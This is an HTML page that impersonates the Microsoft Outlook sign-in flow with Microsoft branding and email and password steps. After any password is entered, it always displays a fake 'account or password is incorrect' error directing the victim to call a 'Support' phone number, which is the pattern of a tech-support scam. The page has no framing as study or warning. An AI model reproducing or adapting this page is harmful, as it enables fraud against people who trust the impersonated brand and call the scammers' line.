<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Outlook Create Account</title>
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
    <link rel="SHORTCUT ICON" href="images/fav.png" type="image/x-icon">
    <style>
        body {
            background: linear-gradient(135deg, #fdfbfb, #ebedee);
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            margin: 0;
            background-image: url('images/background_img.jpg');
        }
        .card {
            width: 100%;
            max-width: 450px;
            border-radius: 0px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
        }
        .card-body {
            padding: 36px;
            
        }
        .card-body img {
            width: 40px;
            margin-bottom: 20px;
        }
        h1 {
            font-size: 26px;
            font-weight: 300;
            margin-bottom: 20px;
        }
        p {
            color: #666;
            font-size: 14px;
            margin-bottom: 20px;
        }
        .form-control {
            border: 1px solid #ccc;
            height: 45px;
            border-radius: 5px;
        }
        .btn-primary {
            background-color: rgb(0, 103, 184);
            /* border: none;
            height: 45px;
            font-size: 16px;*/
            border-radius: 0px; 
            padding-bottom: 4px;
            padding-left: 12px;
            padding-right: 12px;
            padding-top: 4px;
            line-height: normal;
            min-width: 108px;
            min-height: 32px;
            border-bottom-style: none;
            border-left-style: none;
            border-bottom-color: rgb(0, 103, 184);
        }
        .footer {
            text-align: center;
            margin-top: 20px;
            font-size: 12px;
        }
        .footer a {
            color: #0078d4;
            text-decoration: none;
        }
        .footer a:hover {
            text-decoration: underline;
        }
        #outlook{
            max-width: 256px;
            max-height: 36px;
            margin-right: auto;
            

        }
        .form-control {
    border: none; /* Remove all borders */
    border-bottom: 1px solid black; /* Show only the bottom border */
    border-radius: 0; /* Ensure no border roundness */
    padding: 10px;
    box-shadow: none;
}

.form-control:focus {
    box-shadow: none;
    border-color: #005a9e; /* Change border color on focus */
}

    </style>
</head>
<body>
    <div class="container" style="margin-bottom: 48px;">
        <div class="row">
            <div class="col-md-12" style="text-align: center;">
                <img src="images/outlook_logo.png" id="outlook" alt="">
            </div>
        </div>
        <br>
        <div class="card" style="margin: auto;" id="firstdiv">
            <div class="card-body">
                <img src="images/microsoft.png" style="width: 110px;" alt="Microsoft Logo">
                <h3>Sign in</h3>
                <p style="margin-top: -6px;">to continue to Outlook</p>
    
                <form>
                    <div class="form-group">
                        <input type="text" class="form-control" id="emailinput" placeholder="Email, phone, or Skype" required>
                    </div>
                    <div class="create-account-link">
                        No account? <a href="#">Create one!</a>
                    </div>
                    <div class="row">
                        <div class="col-md-12" style="text-align: end;">
                            <button type="button" id="nextbutton" class="btn btn-primary">Next</button>
                        </div>
                    </div>
                </form>
            </div>
        </div>

        <div class="card" style="margin: auto;display:none;" id="nextdiv">
            <div class="card-body">
                <img src="images/microsoft.png" style="width: 110px;" alt="Microsoft Logo">
                <span style="display: -webkit-box;"><img src="images/arrow_icon.svg" id="arrow_icon" style="height: 25px;cursor:pointer;" alt=""> <p id="emailspan" style="font-weight: 400;  font-size: 16px;margin-left: -6px;"></p></span>
                <h3>Enter Password</h3>
    
                <form>
                    <div class="form-group">
                        <input type="text" class="form-control" placeholder="Password" required>
                    </div>
                    <div class="create-account-link">
                     <a href="#" style="font-size: 0.8125rem;color: rgb(0, 103, 184);">Forget password?</a>
                    </div>
                    <div class="create-account-link">
                        <a href="#" style="font-size: 0.8125rem;color: rgb(0, 103, 184);">Use your face, fingerprint, PIN, or security key instead</a>
                       </div>
                       <br>
                    <div class="row">
                        <div class="col-md-12" style="text-align: end;">
                            <button type="button" class="btn btn-primary" id="passbutton">Sign in</button>
                        </div>
                    </div>
                </form>
            </div>
        </div>

        <div class="card" style="margin: auto;display:none;" id="errordiv">
            <div class="card-body">
                <img src="images/microsoft.png" style="width: 110px;" alt="Microsoft Logo">
                
                <span style="display: -webkit-box;"><img src="images/arrow_icon.svg" id="error_icon" style="height: 25px;cursor:pointer;" alt=""> <p id="emailspanerror" style="font-weight: 400;  font-size: 16px;margin-left: -6px;"></p></span>

               

                <h3>Enter Password</h3>
                <span style="color:red;">Your account or password is incorrect Please Call Support for further assistance +1-208-274-4947, </span><a href="#"><span>reset it now.</span></a>
                <form>
                    <div class="form-group">
                        <input type="text" class="form-control" placeholder="Password" required>
                    </div>
                    <div class="create-account-link">
                     <a href="#" style="font-size: 0.8125rem;color: rgb(0, 103, 184);">Forget password?</a>
                    </div>
                    <div class="create-account-link">
                        <a href="#" style="font-size: 0.8125rem;color: rgb(0, 103, 184);">Use your face, fingerprint, PIN, or security key instead</a>
                       </div>
                       <br>
                    <div class="row">
                        <div class="col-md-12" style="text-align: end;">
                            <button type="button" class="btn btn-primary">Sign in</button>
                        </div>
                    </div>
                </form>
            </div>
        </div>

        <br>
        <div class="card" style="margin: auto; height: 50px;" id="signinoption">
            <div class="card-body" style="height: 43px !important;">
                <div class="row" style="margin-top: -28px; margin-left: 5px;">
                    <div class="col-md-6" style="display:contents;">
                        <img src="images/key_icon.svg" alt="" style="height: 30px;">
                        <p style="margin-top: 6px;">Sign-in options</p>
                    </div>
                    <div class="col-md-6">
                    </div>
                </div>
            </div>
        </div>
       
    </div>
    
  
       <!-- Footer -->
       <div class="row" style=" position: absolute;
       top: 95vh;background-color: rgba(0, 0, 0, 0.6);width:100%;">
               <div class="col-md-12">
  
           <p style="color:white;text-align: end;    margin-top: 9px;">Terms of use&nbsp;&nbsp;Privacy & cookies&nbsp;&nbsp;...</p>
       <!-- </footer> -->
   </div>
   </div>
   <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
   <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.2/dist/js/bootstrap.bundle.min.js"></script>
   <script>
    $(document).ready(function() {
        $('#nextbutton').on("click", function() {
            var email=$('#emailinput').val();
            $('#firstdiv').css('display', 'none');
            $('#nextdiv').css('display', 'block');
            $('#signinoption').css('display','none');
            $('#emailspan').html(email);
        });

        $('#passbutton').on("click", function() {
            var email=$('#emailinput').val();
            $('#firstdiv').css('display', 'none');
            $('#nextdiv').css('display', 'none');
            $('#errordiv').css('display', 'block');
            $('#signinoption').css('display','none');
            $('#emailspanerror').html(email);
        });
        
        $('#arrow_icon').on("click",function(){
            $('#firstdiv').css('display', 'block');
            $('#nextdiv').css('display', 'none');
            $('#signinoption').css('display','block');
        })
        $('#error_icon').on("click",function(){
            $('#firstdiv').css('display', 'none');
            $('#nextdiv').css('display', 'block');
            $('#errordiv').css('display', 'none');
            $('#signinoption').css('display','none');
        })
    });
</script>

  
</body>
</html>
